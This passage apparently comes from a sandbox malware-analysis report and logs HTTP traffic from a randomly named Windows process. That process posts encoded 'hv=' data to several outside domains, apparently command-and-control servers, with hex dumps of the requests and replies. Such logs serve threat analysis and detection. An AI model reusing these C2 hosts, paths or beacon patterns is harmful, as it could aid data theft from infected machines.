                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.84972938.47.232.185805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:47.376334906 CEST1636OUTPOST /e5ni/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.yvw66.top
                                                    Origin: http://www.yvw66.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.yvw66.top/e5ni/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 30 67 49 32 57 2b 6c 34 4e 55 42 71 4c 35 65 67 71 6a 54 6d 36 6d 2b 68 51 47 56 39 4e 48 72 43 71 4b 5a 61 59 79 54 73 35 75 43 4e 5a 48 50 45 42 68 56 34 53 6f 76 4b 78 63 58 46 42 2b 73 50 70 52 36 78 53 2b 37 4d 76 6b 74 75 51 36 50 33 44 70 6c 55 52 71 34 79 53 58 30 76 57 30 76 47 4f 78 5a 48 46 48 51 4a 78 34 69 49 62 31 59 66 51 4e 6c 35 56 34 39 5a 63 4f 4d 4c 6f 6f 69 74 50 68 6f 75 65 38 77 62 79 65 68 52 50 42 68 64 6c 79 61 68 56 46 41 74 6a 55 43 50 48 36 77 55 6f 4e 63 70 64 35 2b 68 70 78 63 61 5a 50 66 50 42 57 2f 48 59 73 61 70 46 75 2f 63 35 43 61 4f 51 6d 4b 49 45 6b 4a 42 33 64 76 66 50 72 68 71 53 32 43 49 65 36 4d 58 58 6f 47 77 4f 6d 54 71 33 71 6b 44 62 35 48 6f 4e 49 76 44 61 6d 7a 7a 4e 44 35 2f 50 2b 6c 46 45 69 6c 6f 6e 47 51 4f 76 4d 62 33 46 78 6e 2b 55 6b 4e 6d 72 52 30 78 54 33 6b 67 42 50 32 41 34 62 31 35 65 51 4f 4c 46 31 6e 77 53 70 76 68 6b 6f 76 41 31 64 7a 34 55 70 31 30 51 75 70 63 68 6c 52 6d 71 50 51 4b 74 37 42 49 67 34 6b 70 69 64 64 4c 4b 59 58 [TRUNCATED]
                                                    Data Ascii: hv=0gI2W+l4NUBqL5egqjTm6m+hQGV9NHrCqKZaYyTs5uCNZHPEBhV4SovKxcXFB+sPpR6xS+7MvktuQ6P3DplURq4ySX0vW0vGOxZHFHQJx4iIb1YfQNl5V49ZcOMLooitPhoue8wbyehRPBhdlyahVFAtjUCPH6wUoNcpd5+hpxcaZPfPBW/HYsapFu/c5CaOQmKIEkJB3dvfPrhqS2CIe6MXXoGwOmTq3qkDb5HoNIvDamzzND5/P+lFEilonGQOvMb3Fxn+UkNmrR0xT3kgBP2A4b15eQOLF1nwSpvhkovA1dz4Up10QupchlRmqPQKt7BIg4kpiddLKYXN5en7phX54todeaUBRfMNU9we8q+eTv2v/n/qU9wfwO+RV+LDu4k1pJfKyN2bXxYE104yRSozRJeUV8RNoUNlMG+q+2L9evDDiOleWMCOKb74g/6rLJpLOsJmtBZ8OtV6ghBrxTmin20UWm8hu40uUYAl3/uSXEpuOYpRYTTXzufx78l7vlp+cirBV5okED0MKKhJK/Gr3L3TTjBr45ZoBv1B+dAGxzlNTZbR8sDQLGz/Kr/rDcKR81EGe1tqbjAUbyHsYSRYr/ccbNLH+eAvnU0rwpCDmemCWr3HeOyhx/k0Yqv13L5ifJoWaH1h9UwKW94td4ihIQSFvrbbWw/9+/RhqcU3vDZHyZ6GbyFqXvVGUjf8hTYvYu/oFlxCbiRx+cYquCUYF0PUJAKCTv1kIsNPS1f9+nOjn8IavpK3unp7Xj3pmhaUrOE1KVIRk3s0BBYX/OlRcAMlAm99Jq83VRbAH0bI794siEDj1uWsnotHFwHmQw4rODMEaaJrPQ0s+iKhKbgrwT68vnqGAK89jm5vVL53ayoihF4m0sU92zLI4y5ZPLAFHITq6Z9RmLcWE2xiEKX7+82JAs9Zi5yAjXvVK/qXPzmGEAkiauzna/8BgSx/G/eItkSd6P/UgiV/pFfDLnbnEXlWdcwGBXSI/HQT7cycwDJv/ [TRUNCATED]
                                                    Jul 1, 2024 15:45:48.313740015 CEST289INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:45:48 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.84973038.47.232.185805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:49.913324118 CEST346OUTGET /e5ni/?hv=5igWVKYME1F2HJuEqzDD4BytRWNfFWn6ld9EO0nuwIC7ejuHGgZWNZHr69K3UvIzgGWBTOng6QRLO5bRM99dWtUQcUECcC3CaxVjbCwQta3fR2FUS95NK5IjfJQajbbRQA==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.yvw66.top
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:45:50.833156109 CEST289INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:45:50 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.8497313.33.130.190805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:55.906254053 CEST638OUTPOST /vapn/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.fundraiserstuffies.com
                                                    Origin: http://www.fundraiserstuffies.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.fundraiserstuffies.com/vapn/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 2b 4b 34 69 75 38 4c 4f 6f 4d 57 6d 4a 48 63 66 31 56 44 6c 59 4e 44 47 52 64 2b 4b 51 79 39 41 61 6f 32 44 30 70 6f 47 77 6e 74 74 75 73 65 61 55 51 51 41 73 58 43 61 48 68 55 52 4d 30 54 35 4a 72 42 33 31 53 73 4a 50 56 31 70 49 50 43 63 44 33 38 6c 43 56 57 64 5a 38 64 54 71 34 4d 6d 64 2b 5a 54 6b 50 74 76 6c 6b 6c 65 6b 65 6d 43 30 4c 52 62 51 58 62 51 53 2f 6a 38 75 36 2b 79 4e 38 51 38 4b 76 55 42 4f 6b 33 74 5a 6c 58 2b 39 2b 65 56 67 56 6d 71 35 6e 6c 58 4b 35 65 57 31 62 79 70 6d 4f 4c 61 35 2b 76 37 69 43 66 73 6c 5a 4f 67 36 6d 61 6d 6b 4c 39 66 4b 64 72 72 6e 79 50 7a 38 72 45 3d
                                                    Data Ascii: hv=+K4iu8LOoMWmJHcf1VDlYNDGRd+KQy9Aao2D0poGwnttuseaUQQAsXCaHhURM0T5JrB31SsJPV1pIPCcD38lCVWdZ8dTq4Mmd+ZTkPtvlklekemC0LRbQXbQS/j8u6+yN8Q8KvUBOk3tZlX+9+eVgVmq5nlXK5eW1bypmOLa5+v7iCfslZOg6mamkL9fKdrrnyPz8rE=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.8497323.33.130.190805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:58.443218946 CEST658OUTPOST /vapn/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.fundraiserstuffies.com
                                                    Origin: http://www.fundraiserstuffies.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.fundraiserstuffies.com/vapn/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 2b 4b 34 69 75 38 4c 4f 6f 4d 57 6d 50 6d 73 66 33 30 44 6c 4e 64 44 4a 65 39 2b 4b 62 53 39 45 61 70 4b 44 30 6f 73 73 77 30 5a 74 75 4e 75 61 56 53 34 41 72 58 43 61 54 78 55 55 44 55 54 32 4a 71 38 43 31 51 34 4a 50 54 5a 70 49 4c 47 63 43 41 67 69 51 31 57 54 56 63 64 52 75 34 4d 6d 64 2b 5a 54 6b 4f 4a 4a 6c 67 42 65 6c 74 4f 43 32 75 39 61 64 33 62 52 54 2f 6a 38 6c 61 2f 61 4e 38 52 54 4b 74 78 57 4f 6e 44 74 5a 67 72 2b 39 76 65 57 71 56 6d 57 6e 58 6b 50 5a 38 48 6f 79 61 4b 52 73 2f 58 2b 2f 74 57 46 6a 30 79 47 2f 37 47 6d 35 6d 79 4e 6b 49 56 70 50 71 32 44 39 52 66 44 69 38 51 49 42 49 51 54 75 6a 4b 77 76 6a 2f 30 74 31 74 4d 39 76 37 36
                                                    Data Ascii: hv=+K4iu8LOoMWmPmsf30DlNdDJe9+KbS9EapKD0ossw0ZtuNuaVS4ArXCaTxUUDUT2Jq8C1Q4JPTZpILGcCAgiQ1WTVcdRu4Mmd+ZTkOJJlgBeltOC2u9ad3bRT/j8la/aN8RTKtxWOnDtZgr+9veWqVmWnXkPZ8HoyaKRs/X+/tWFj0yG/7Gm5myNkIVpPq2D9RfDi8QIBIQTujKwvj/0t1tM9v76


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.8497333.33.130.190805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:00.973404884 CEST1675OUTPOST /vapn/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.fundraiserstuffies.com
                                                    Origin: http://www.fundraiserstuffies.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.fundraiserstuffies.com/vapn/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 2b 4b 34 69 75 38 4c 4f 6f 4d 57 6d 50 6d 73 66 33 30 44 6c 4e 64 44 4a 65 39 2b 4b 62 53 39 45 61 70 4b 44 30 6f 73 73 77 30 42 74 74 2f 57 61 55 7a 34 41 71 58 43 61 50 42 55 56 44 55 54 52 4a 72 56 4b 31 51 6c 38 50 57 46 70 61 34 65 63 4c 52 67 69 4a 46 57 54 64 38 64 4d 71 34 4d 7a 64 2b 4a 58 6b 4f 5a 4a 6c 67 42 65 6c 72 79 43 79 37 52 61 66 33 62 51 53 2f 6a 4b 75 36 2b 33 4e 38 49 6b 4b 74 30 72 4f 55 62 74 5a 41 62 2b 37 64 6d 57 70 31 6d 51 6d 58 6b 63 5a 38 44 4e 79 61 6d 64 73 2f 7a 41 2f 74 2b 46 76 77 76 63 76 49 2b 4b 76 57 36 36 2f 36 46 73 4f 71 79 6a 2b 43 62 67 6f 66 77 77 58 39 73 79 6b 52 4b 7a 74 68 53 74 7a 53 56 64 36 62 47 70 4f 45 6b 50 36 45 43 54 2b 6a 74 58 32 36 6f 42 39 52 63 54 33 42 6c 41 75 34 6e 46 56 4e 66 33 70 35 67 39 37 41 46 4d 45 32 4a 39 56 55 76 32 67 2f 36 45 41 34 6e 68 59 2f 47 6e 31 38 69 32 32 6a 32 2f 47 4e 66 73 4c 41 47 45 53 54 38 6c 41 2b 32 57 57 63 70 68 71 78 6f 47 53 78 32 41 6b 30 73 66 52 32 66 55 47 68 76 55 65 63 5a 5a 43 30 32 [TRUNCATED]
                                                    Data Ascii: hv=+K4iu8LOoMWmPmsf30DlNdDJe9+KbS9EapKD0ossw0Btt/WaUz4AqXCaPBUVDUTRJrVK1Ql8PWFpa4ecLRgiJFWTd8dMq4Mzd+JXkOZJlgBelryCy7Raf3bQS/jKu6+3N8IkKt0rOUbtZAb+7dmWp1mQmXkcZ8DNyamds/zA/t+FvwvcvI+KvW66/6FsOqyj+CbgofwwX9sykRKzthStzSVd6bGpOEkP6ECT+jtX26oB9RcT3BlAu4nFVNf3p5g97AFME2J9VUv2g/6EA4nhY/Gn18i22j2/GNfsLAGEST8lA+2WWcphqxoGSx2Ak0sfR2fUGhvUecZZC02DhpzW1kBcHbobOkwPo/s99OOfM9c9VYHUFU+rDVeT5Nr6QcbfOKY7kd29PvVMcPA02ZQ5QUDnJQqILR32qM78C0Pf35Ztx0a9KqwNMCZMlMHSeWMKEnkwSFHuLdUw/D4Ryt+4ZwHoIE3DNC2Ykq3a6g7XLMxS7SlZaoy5xhlLgCotVuGcsE9+vodkrTh6ma6pXqpxkSv9hJUICaABjBqVBE0QbwtDG90AsZl1REt9uVael1mgnwGFD9MXy3KPO6nfQHFmnoQaUG2mVTnVxQa+k9kTljPNw3k1nohVo906QNRtE2qHLplKX1euTPXcUc/MYH29clyP+96NAUI22UjZNBMGOOnzg6NAvtLzy0ClHcZF9tJJWXGMeU9LHln0E8VoLZUc/StpnF6RNOwhy+lHHoarwNVHOjVAYnBous5z+JQsH7Y5A1AuJV/1kkQwQSU6T0EtAl2HBEsIJcXCDJheJY1syhC07jU1MNaHOnEZ5KgVDtZ6XRmV5G2P9eR1fA7/BIJTMoUAyofwcv7juE//I5yrMHqHnjWkvYwjwBGII7d16doxPFyqL4JZgElL6bO2c6YC/Vau7Llzb3FW9By/7Rt0vURS+r1BGgRHKCj3FKgJvBwW3VZ3VCjjD/CNUXlpPnR9Oz8d6L61sZdLEweM9zvf/OQMhuw25 [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.8497343.33.130.190805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:03.504300117 CEST359OUTGET /vapn/?hv=zIQCtJPr8f6IEHIEo3TNC67HH9mmSCxic5WS7/A3sw1OteiabhN4nVuyPRk+K2L+MLR9kC9TPTQdF4ehIT0bCTCmTt1bteoRMu1plsZV53w6ucKr+pMiAUHXVfrsn+3QcA==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.fundraiserstuffies.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:46:03.969911098 CEST404INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 01 Jul 2024 13:46:03 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 264
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 68 76 3d 7a 49 51 43 74 4a 50 72 38 66 36 49 45 48 49 45 6f 33 54 4e 43 36 37 48 48 39 6d 6d 53 43 78 69 63 35 57 53 37 2f 41 33 73 77 31 4f 74 65 69 61 62 68 4e 34 6e 56 75 79 50 52 6b 2b 4b 32 4c 2b 4d 4c 52 39 6b 43 39 54 50 54 51 64 46 34 65 68 49 54 30 62 43 54 43 6d 54 74 31 62 74 65 6f 52 4d 75 31 70 6c 73 5a 56 35 33 77 36 75 63 4b 72 2b 70 4d 69 41 55 48 58 56 66 72 73 6e 2b 33 51 63 41 3d 3d 26 53 62 7a 64 62 3d 44 76 67 58 57 64 4e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hv=zIQCtJPr8f6IEHIEo3TNC67HH9mmSCxic5WS7/A3sw1OteiabhN4nVuyPRk+K2L+MLR9kC9TPTQdF4ehIT0bCTCmTt1bteoRMu1plsZV53w6ucKr+pMiAUHXVfrsn+3QcA==&Sbzdb=DvgXWdN"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.84973581.88.48.71805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:09.076381922 CEST626OUTPOST /8lwi/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.aquamotricidad.com
                                                    Origin: http://www.aquamotricidad.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.aquamotricidad.com/8lwi/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 59 54 43 66 6a 71 74 52 77 6f 47 56 6b 35 54 6f 65 6c 35 57 6b 67 6c 59 2f 58 48 65 76 59 65 67 30 4c 78 79 62 47 42 70 57 6c 30 36 36 4c 6d 54 31 4d 6e 2f 46 47 66 66 41 31 4a 2f 77 42 76 6a 2f 35 61 55 77 4f 6a 38 55 49 55 49 67 45 46 76 47 69 6b 76 32 56 2b 57 6b 51 43 71 4b 44 66 4a 59 7a 6e 67 31 79 55 70 64 4e 46 6b 35 78 54 48 64 6b 59 38 39 61 4e 44 6d 73 6a 51 68 4a 55 62 43 37 55 65 73 64 65 77 41 2b 48 35 67 31 35 6f 39 41 71 6c 54 78 54 51 44 71 32 41 6e 76 4b 48 47 52 33 36 5a 6d 38 35 71 38 78 37 2f 76 7a 48 77 46 67 51 4a 52 4e 49 73 44 54 39 4d 78 76 38 59 34 47 4f 57 2f 49 3d
                                                    Data Ascii: hv=YTCfjqtRwoGVk5Toel5WkglY/XHevYeg0LxybGBpWl066LmT1Mn/FGffA1J/wBvj/5aUwOj8UIUIgEFvGikv2V+WkQCqKDfJYzng1yUpdNFk5xTHdkY89aNDmsjQhJUbC7UesdewA+H5g15o9AqlTxTQDq2AnvKHGR36Zm85q8x7/vzHwFgQJRNIsDT9Mxv8Y4GOW/I=
                                                    Jul 1, 2024 15:46:09.794313908 CEST367INHTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:46:09 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 38 6c 77 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8lwi/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.84973681.88.48.71805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:11.750438929 CEST646OUTPOST /8lwi/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.aquamotricidad.com
                                                    Origin: http://www.aquamotricidad.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.aquamotricidad.com/8lwi/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 59 54 43 66 6a 71 74 52 77 6f 47 56 6e 59 44 6f 4e 30 35 57 69 41 6c 62 77 33 48 65 6c 34 65 6b 30 4c 4e 79 62 47 70 35 57 54 6b 36 36 70 4f 54 6e 65 66 2f 43 47 66 66 49 56 4a 2b 2b 68 76 34 2f 35 66 33 77 4c 62 38 55 49 41 49 67 47 64 76 48 56 77 73 33 46 2b 55 69 51 44 73 56 54 66 4a 59 7a 6e 67 31 79 51 58 64 4e 64 6b 35 68 6a 48 62 46 59 37 30 36 4e 4d 76 4d 6a 51 6c 4a 56 53 43 37 55 67 73 63 43 57 41 38 76 35 67 30 4a 6f 39 52 71 6d 49 68 54 53 50 36 33 77 75 73 33 52 4a 53 6e 62 63 41 30 6b 72 75 34 48 2b 5a 65 74 71 6e 6f 57 4b 52 6c 6a 73 41 37 4c 4a 47 79 55 43 62 57 2b 49 6f 65 74 45 38 57 6c 6e 6c 41 4e 56 57 32 45 65 4d 4a 2b 39 52 54 50
                                                    Data Ascii: hv=YTCfjqtRwoGVnYDoN05WiAlbw3Hel4ek0LNybGp5WTk66pOTnef/CGffIVJ++hv4/5f3wLb8UIAIgGdvHVws3F+UiQDsVTfJYzng1yQXdNdk5hjHbFY706NMvMjQlJVSC7UgscCWA8v5g0Jo9RqmIhTSP63wus3RJSnbcA0kru4H+ZetqnoWKRljsA7LJGyUCbW+IoetE8WlnlANVW2EeMJ+9RTP
                                                    Jul 1, 2024 15:46:12.421789885 CEST367INHTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:46:12 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 38 6c 77 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8lwi/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.84973781.88.48.71805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:14.283866882 CEST1663OUTPOST /8lwi/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.aquamotricidad.com
                                                    Origin: http://www.aquamotricidad.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.aquamotricidad.com/8lwi/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
